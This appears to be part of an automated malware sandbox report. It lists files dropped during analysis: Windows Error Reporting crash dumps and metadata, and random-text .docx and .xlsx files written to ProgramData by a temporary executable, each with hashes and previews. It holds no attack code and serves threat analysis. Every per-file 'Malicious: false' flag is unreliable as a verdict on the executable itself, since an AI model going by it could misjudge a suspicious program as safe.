Preview:	MDMP..a..... .......be+f............4...........H...H.......d....#......t...D?..........`.......8...........T............9...............(...........*..............................................................................eJ......x+......GenuineIntel............T.......t...Ne+f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1A52.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8334
Entropy (8bit):	3.696920599948484
Encrypted:	false
SSDEEP:	192:R6l7wVeJnR6X806Y9CSU9Z6Pgmf1zfoKPpDQ89bH+esflktEm:R6lXJR6X806Y4SU9wPgmf1zg8H+dfEx
MD5:	47DA6DEC1F482DBD72EBB1E85D9DDE58
SHA1:	6D944A72592BE428399BDEE9936C7169C8D76C52
SHA-256:	7AF4DEE53A054EA9DD0945F741E89F3159B857C94BE889315D559053B6CFFC7A
SHA-512:	0D5822954516506964E161D6B3E35B92108FEE146587B622D9F28A7750C5B7C5E9C1C984204B7FE6CB15549DA0ED56286336A5DD920A9CF49991E93763DD807D
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.2.8.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1A82.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4579
Entropy (8bit):	4.4716764033338166
Encrypted:	false
SSDEEP:	48:cvIwWl8zs8Jg77aI9+cqzWpW8VYUEYm8M4JCxFkIx+q82oxksfLd:uIjf6I7jD7VDxJJIxozfLd
MD5:	2134F955B60769A9E8D0C9ADBE59CD9C
SHA1:	5BB65404FEE669B87EFC528A75B2EE4891ABB65F
SHA-256:	68344BD7DBFEDE2DCC5F26F84CF4E886AB040A0696A3DB6370CA3DFDC281BD33
SHA-512:	46BF604B7589EC79DFBDA607F4CD6384A0D26520AAD6CAE286B0C6DDB74BCF46F1AABB9AA6CD1FDB9189A91D35733FBF49C01ABC0CCBFF61802F0E831D7E90E5
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="296609" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8262.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Apr 26 08:27:41 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	62206
Entropy (8bit):	2.729587193344416
Encrypted:	false
SSDEEP:	384:AkGFsFcRgE30wXSN4udOjMot2+moPCIaV:AFsygE/XSNFk2+5B
MD5:	33F6DA4A42FE1AF4AFC0E66491116DBE
SHA1:	2A04C5A591CA2BA979FA8573B1D69CF7CFBA92D7
SHA-256:	DFA9A68B67B0B27DFC71CC86D21633B14A36019DC40EE38AE2A44B0245D890F8
SHA-512:	4F5E65629F942DA3A8150E7629D326E51D1510BD3D8D075D658D12F46EA8B5248D2CBFDC65DBC225F9DB9527D238FF4C3F817FAD4FCEECCE89BB5275723D2DFF
Malicious:	false
Preview:	MDMP..a..... .......}e+f............4............ ..<...........v9..........T.......8...........T...........`Z..............((.........................................................................................eJ.............GenuineIntel............T...........Se+f.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER839B.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6304
Entropy (8bit):	3.714208353146262
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetbnT6+YfzWf0gaMQU789bHGesf4tcm:R6l7wVeJnT6+YfzepD789bHGesf4tcm
MD5:	C8936016687BF78A8B3518120A6217B1
SHA1:	9D5C632EE0874ED16F0ABAC0FA7DAC4C88984620
SHA-256:	8BD4BB29C8BA2DA29A7875A3A9468D5572D05C1AFF0781477B21B5D631D9FF3C
SHA-512:	B52CE63E42BF2BE510A55F9AFB0E3D484FD7AEA5D8A6EF178715215CEE4C88B2E68E06C2DA7E4AD9E2097EF9C91D04A71353EDF7C5CF05FC805FB04A7B3F1594
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.6.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER83CB.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4551
Entropy (8bit):	4.428339665112073
Encrypted:	false
SSDEEP:	48:cvIwWl8zskrJg77aI9+cqzWpW8VYKYm8M4JFmArtFO+q8OBNNrr6Ngd:uIjfQI7jD7VOJobWNgd
MD5:	26E0050035D9B412A96E90AF1F5812DD
SHA1:	0CC6FB3A950DE39754888E53D4354AED8F30A536
SHA-256:	A86104C64BFA3E1DB44C566ACFAF57F4A0221E20B3B5E5AAD01D083F7AC4904E
SHA-512:	55E143B3121E9FA876F0DE4A709C83BB6735A5515F3A840C9F89951D8033008997303835FE47A5A29757FE5BABDC3DB08561CE964EB2C450CBD70A2269240736
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="296610" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\ONBQCLYSPU.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5mc.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\ProgramData\PIVFAGEAAV.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5mc.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.685942106278079
Encrypted:	false
SSDEEP:	24:e80g32tqxncx15PRgoZOZUxcz6oV0dh0dxiXMK:e87SH5Go0ZeuDufAiXMK
MD5:	3F6896A097F6B0AE6A2BF3826C813DFC
SHA1:	951214AB37DEA766005DD981B0B3D61F936B035B
SHA-256:	E6E3A92151EEE0FCDF549A607AE9E421E9BB081D7B060015A60865E69A2A3D60
SHA-512:	C7BD241F0E71DC29320CC051F649532FFF471B5E617B648CC495413587C06C236AFA4673A7BC77409E989260278CDEF49BDACA38BEB6AF65FEE74C563775B97C
Malicious:	false
Preview:	PIVFAGEAAVVMYOKLIHAGVKQSIBRMIEBPKZHRSRYSYCTZASSEWGQLTFYPITGFBLIMOSZPCOYJLDMIKUYRMFZNOVAKNNFUFMFWAQZIZZSOHPUKTMEQKVMZGORRHHUAPAVEHNTRHFTCOWUQLMTXHFAASXNSJOMVEVZKIBTYUEOEAYWORCLXNWXMWVTCVFUJOOHJFVBTQGYSPLVNZVQAKYRWBXASIFOBPMFAPMAVEFPAYEVCHLKOVGMAFTDZYSFCRVFLUCDEZSALOPZIFCHRCOADKGTQMGRAQFQVFLPTIZCOVQGXVCITLOKGAEHQOUDVVLBLANQIWAMALJXSPVCLVLGENZFIFSPDTQOOAOXTRKMORBXQQUMCVCGJNJNIYGXUUXANSJRSROPOUDFHQHUUMMRXDQWLRABBQAZENYVIBHRRHTGWSIVVUQDLCOQYLVPAUFYYHGIERJJLVMIHLHHCCGHRLMANSNVNAYHLENOWUETBHLULUXLDUIUWHDTSBTXYABZUPEVNUTYDIYOWXZQQWZTIKHRACSWYILZGJJAYPXSWVAJEAMWRWUWIOONUGSOWTNWVILBTRYWXPSGGJYETTQICCTQMOORSZENPULBEQOBSNDWJHFGZOXAYRMRTCQAGZFKLTXQJCKKKJTXRIIVBYSWRFFSDWLAWEVZNFVJIYAKGOFIKGKPALYKLUSFUZNXBTTGJQARLJLEPNMUPZBHUFERZBUARRWLRQMAELUFJHXEPWKNEOUOFWRPCGUFYJEWTUPSXMLBAGQWILTIUMBXONDPOFUHNKJJKISPTLDQHMYGKSUZUEBYHKNHJUVSBOBSFQWTBGVEFNVAAKMXTORQQDIBVTWEQECBUJMCLMNPNRTKIKGQQLCBXEDYYHZALQNWVUKKTUNZMKPSISXIDNZZXVGUERMWOJYWVPNSTVVUORBONVDVVOSICVUMWTQLGBVUNLJTMTSZIJARQMRHCGASSVBBFIRIMTSICIANQBRVHJQBP

C:\ProgramData\RAYHIWGKDI.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5mc.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69782189124949
Encrypted:	false
SSDEEP:	24:Ejrsjf7MixEleswsyrKNRsfqDG97h9JFQttKZUsgd:AruwiCl9RyrKzDGvFothJd
MD5:	0640503E533EFB11CC70F43D2FFF4E26
SHA1:	EEACB5C334E23451DEF6DF7B1DBC836F8D5DC7F1
SHA-256:	F1E1D526371BA959E03143C250244912FE0B9C0002FB521B35EBF6B303A45240
SHA-512:	10A6184DE66D8DCFB784A4CADD010433A6E64B5C2BBDE73C5E804CB9C4A1DD42589D5B3F81004548BD4F4B48CDEC5E59F703C6E1CC91052578C191B0420B3F20
Malicious:	false
Preview:	RAYHIWGKDIRTARQYQWOBCGSCZTUKIHKHGIDMMEQIAQREXBEXSICMBOCZGGWHBLUMCKDMBQEITRPKYTMYLFIYWQOJESATZEPWZIOXPWBQZTJXLAJZABRWIVUBVJFSNDCHMUKOSZLAGXHWLJOZTOGXVRCKZUWMQJXXEBALSHWQQWMZSSNQPYAVMCOWPGIQXROQBVBCHGZFDUPLKTFJZFLPQAZUSOCBPSHUJTOHHLCAJMVXHEMQRTWBFOCSIQLCVPUVRLGBXUQDWIUHVAEKDXVYQFLOJKPUTQAUYMMBEAALRHWXLPSGJQAXQEKMLZIZODFPAFRSSEYDMLJMRHMTAAIXEFUIILJKVGEZOYKKWEPVJQVNYFFYKRTQETFXFNAJIKRVPASKSGPKFCKZPAWWPVZRALMCBKRDOEIBIKKTHQIKXETYHIXFIDXRTNRQTJUYJKPFSYLHGPQHDQCLEGRHMOWEKRHPYXHYBEJRWKNVHYVSFWCDDPTNQKIIPYEUERDNPUHTABOGALJFLNCHFVUUXYWKPWLFGSGGMLBJNUKSZDRMWINHKUODGVGUBXUFJZPIOPPUJJYPIYBSMFJDODMOMNHZLFGXCLRVZWGCTYATVPBVTSKSTKWSAFNJQHUTMYXATQBLVEOPUSEAHMLQDLRSJXGJWRUIJXFKGYOEOWEZOSKCJPIVESIUXOBETKSWFUVRRKSLBTDFQSCFNKQERIRRRREBLOQVLIDYLYKYFMCQBLBQTNJMMMKSVARWYDTJAARNVMOUPHYNYYQMCBERSBXMHXDBNYDZXQLRKYTIFDCWTEPNQGQDWHEMKECWRJGPESGZBVSBOMTJRUQQIBGIJFHOYKRJHNKMSSTEXXZGWSIGMLAJNJNUENSYJRBGUJKNETIMQHONDPCBMBYBIBNOHNJQYWEOHOCGOHXGWYYBPTHRZNFMHKEAHSEPDNXXSDYRREJULDTKDSLQABJKBZDQSIPXTUMOMUNOTGBAJQSBTRFIGSLC

C:\ProgramData\RAYHIWGKDI.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5mc.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69782189124949
Encrypted:	false
SSDEEP:	24:Ejrsjf7MixEleswsyrKNRsfqDG97h9JFQttKZUsgd:AruwiCl9RyrKzDGvFothJd
MD5:	0640503E533EFB11CC70F43D2FFF4E26
SHA1:	EEACB5C334E23451DEF6DF7B1DBC836F8D5DC7F1
SHA-256:	F1E1D526371BA959E03143C250244912FE0B9C0002FB521B35EBF6B303A45240
SHA-512:	10A6184DE66D8DCFB784A4CADD010433A6E64B5C2BBDE73C5E804CB9C4A1DD42589D5B3F81004548BD4F4B48CDEC5E59F703C6E1CC91052578C191B0420B3F20
Malicious:	false
Preview:	RAYHIWGKDIRTARQYQWOBCGSCZTUKIHKHGIDMMEQIAQREXBEXSICMBOCZGGWHBLUMCKDMBQEITRPKYTMYLFIYWQOJESATZEPWZIOXPWBQZTJXLAJZABRWIVUBVJFSNDCHMUKOSZLAGXHWLJOZTOGXVRCKZUWMQJXXEBALSHWQQWMZSSNQPYAVMCOWPGIQXROQBVBCHGZFDUPLKTFJZFLPQAZUSOCBPSHUJTOHHLCAJMVXHEMQRTWBFOCSIQLCVPUVRLGBXUQDWIUHVAEKDXVYQFLOJKPUTQAUYMMBEAALRHWXLPSGJQAXQEKMLZIZODFPAFRSSEYDMLJMRHMTAAIXEFUIILJKVGEZOYKKWEPVJQVNYFFYKRTQETFXFNAJIKRVPASKSGPKFCKZPAWWPVZRALMCBKRDOEIBIKKTHQIKXETYHIXFIDXRTNRQTJUYJKPFSYLHGPQHDQCLEGRHMOWEKRHPYXHYBEJRWKNVHYVSFWCDDPTNQKIIPYEUERDNPUHTABOGALJFLNCHFVUUXYWKPWLFGSGGMLBJNUKSZDRMWINHKUODGVGUBXUFJZPIOPPUJJYPIYBSMFJDODMOMNHZLFGXCLRVZWGCTYATVPBVTSKSTKWSAFNJQHUTMYXATQBLVEOPUSEAHMLQDLRSJXGJWRUIJXFKGYOEOWEZOSKCJPIVESIUXOBETKSWFUVRRKSLBTDFQSCFNKQERIRRRREBLOQVLIDYLYKYFMCQBLBQTNJMMMKSVARWYDTJAARNVMOUPHYNYYQMCBERSBXMHXDBNYDZXQLRKYTIFDCWTEPNQGQDWHEMKECWRJGPESGZBVSBOMTJRUQQIBGIJFHOYKRJHNKMSSTEXXZGWSIGMLAJNJNUENSYJRBGUJKNETIMQHONDPCBMBYBIBNOHNJQYWEOHOCGOHXGWYYBPTHRZNFMHKEAHSEPDNXXSDYRREJULDTKDSLQABJKBZDQSIPXTUMOMUNOTGBAJQSBTRFIGSLC

C:\ProgramData\SFPUSAFIOL.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5mc.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696913287597031
Encrypted:	false
SSDEEP:	24:TEp0dGAR5tKV4V1dnQcncjGi20QoVwGQqh3:20Iw5tKOncjGUwra
MD5:	44ECF9E98785299129B35CBDBCAB909B
SHA1:	4D92AFB00FE614CC8B795F1AF28173DBE76FE7F5
SHA-256:	06E706536CB7D543E6068C98C90721CAD89C23D16D37444F46F9B01C4380DF9E
SHA-512:	1FA347223014BB3AC0106948B07E337B1A98C0BA2D98AC0ADD821D1B3CE9F75681F6383925F5E614F36750C5B9FB92D1C8EEEDC05469FBC6EA3F281D8B52B556
Malicious:	false
Preview:	SFPUSAFIOLDMTRNUTGNTJUWFCWSZSHWEDVXRKVRQQJURAYWLWUUBTIKENFOXKWAEIMQEIZNZNRADQPATZGCMDPRDXLQGZUFJZGZDRTSVNCHAUPMRLPRPZKGVAVXYEVCKEHKMMJGKSJOOUYGYLDDIEYHRSUUPROPBGJMTERPOAVKYFPSCESRJNQZFKBQPUDQDDUMCFWKLZTOAKIRCBYNHNUNDHQGUCZFGLFAWYRAYVDHRMGQXAXAOYSCNPGEKEPCMQBIHRFANOHHAWKRVIORZYSDKULQZFRPSGFVYRDRVLMMPKWJDXUOEBNLILNONKXLMXLVIUCYNNQGCPDXMGSCUEKRTGZJHMNRUEKEIJFJIAHVLHOVPEFBBLWOKZSZSYSSOQIMAXYTLNUMGPOHCVAJUEBTRJRPRJCOTKTDCOEZCJXDLESVDTKVOFQWENRQDQXACWTCILXCPGHHUNHJNQLPPCERJAOCZFIXIHZKTCKZMXYDXVVFZUURETLUVBDNYJHWBIGQTEBATUDWNJLGPYCGIXUBQTVJPDRWVOFIQDYMJOMWUQUNCHQWGETEEEIJZNHHUYACVFRBGSWATTYVHFTURPBDTDDQTWASRBMLCMLRKIGMHWRHHHUVZTGIFNIDBHRKNFOYFIOYERMIXFEIANSZHVUVBFJOQNNJGQUNDLTPKRMYXNUHBOFQLLIDRDFMIAAVQNNXFNDRFBIGEVUSBEJUVVSTEJYKSAUCFDNNJQTSVXAUBHAPFHJIYCNFJQPWEXKMUQRCKERPSFCQKHEDKHHRNWTLAMXHJLOSIZOKYIMDHNEIBAUBKXVXZVXMAZNFTTYQGDGZHKLIHZJNIVHVZHYMNESIMFITKHGIPXKXZDBLBTKTNZDKZTKDHQQJCJDTRVKOCTCXPMDLKSOBGZSQQUTNFYYEOCJVZSZUSESOBKMIJSKKSXTXITISLBTMALAVZEMHXQXVRBZCDKLOKWDYQIEQCKFLKBMPLIQMKDTJPRHOW

C:\ProgramData\SUAVTZKNFL.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5mc.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69422273140364
Encrypted:	false
SSDEEP:	24:hdGRma8y0UOkmVb01yh9qfT+PsSMxto3vIcMhrzxYWSDHtj:hdGRma6bRh9rsFE/uhrOWSDHh
MD5:	A686C2E2230002C3810CB3638589BF01
SHA1:	4B764DD14070E52A2AC0458F401CDD5724E714FB
SHA-256:	38F526D338AC47F7C2CAB7AB654A375C87E51CC56B4FA09A7C5769E2FB472FFC
SHA-512:	1F2AA9D4B55B52C32EF0C88189256562B16DF13EEA0564BD7B47E45CC39279F39823033ADF95BBD9A50B4F35E417E418C4D20BBE14EF425EFF7134ECE05BEB3F
Malicious:	false
Preview:	SUAVTZKNFLPDUIKIPSQJDVGAPGXKDOHYHNOWHLTUYHUBPZNAGHXWSRGELNTTLWSOVKHBKQEKGENMQDFUYQEFPUMFVGFHNHBEYAAJVHSIYLSLGVZSSKYNEFOJGJXPWCGXOBRZVXDWDDKKLDGWVLNCMOJKBSBYFMTKILZOONEGLZWORUNOTXJNOTGXQTUBOXEFHVICNNYYHMRGCLTZLWQODATYJZBGFVEMSABDUIKNKVRGQOHHCSHZAJIYWZLGGZOOEOQBTEAFTXBQJIHRZBDRPFDGHVFGYZEIHFYVBPAXJYSLOTRVHEFEEWXUGJCOLFXEKSPFHBKQEHGPZADNNCAUYCTEDLFKZMZOQOADUCTDIOYKELVKGABHEMOSAYPWUUKTZHQNEQWLFATTPCULHLMBMEQVAXDFQNQLMLVOFTUTWLMJNLVNCRHTWUTJEEORGWISXALHDTNXRCWVMZRUEMSVOJYMENRHGVXXMGLOWYRFKZLPBZQMETPESMZPCJGYXVQSMCJXYEMMNKLPIXGOXOMQNYCFAEVPXDGOFEGSLWKBUOLRKXGTWDFUVGYFTOWQZAOIMQUZEELMCQWKUBEWGFDVXSXNGHPJNVDQHMPSSIFZTQLVBBHZOEGNPDAWAYLIRBWZHXRAXBBESYNRIRINAKLQMELNYRHRPKDBUCNSZOVHNTBCUYDQTGFWZJUCUZBHHXHQHKWOWTEWLUGGGWHIHCWZLLJPDFVDICZBBLFSECTLMQBKCPCHANOICKIUSVAJTYQOIUWRGVAFOFTMIHARUUCNGBLVFIKMTTGPYXNEVGLPMZDMIQDQOLIEFHNZYMZTCDOHBNQLNVLXRUXMGYCVOJDBWPSJKMFMEDBEMXULQBRVRKPYNUACCXNPGFEMPXDXNEIPTKGSKUMVFSLCTJFHNFATCDKSZWKYMVQNTVHCOAJXDUTJZESFLKTQOGREXBTBVBGLDYJYDTNEAQDFRTXMJIHJCCTPUDZLNKNEABFQYCDL

C:\ProgramData\VLZDGUKUTZ.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5mc.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZ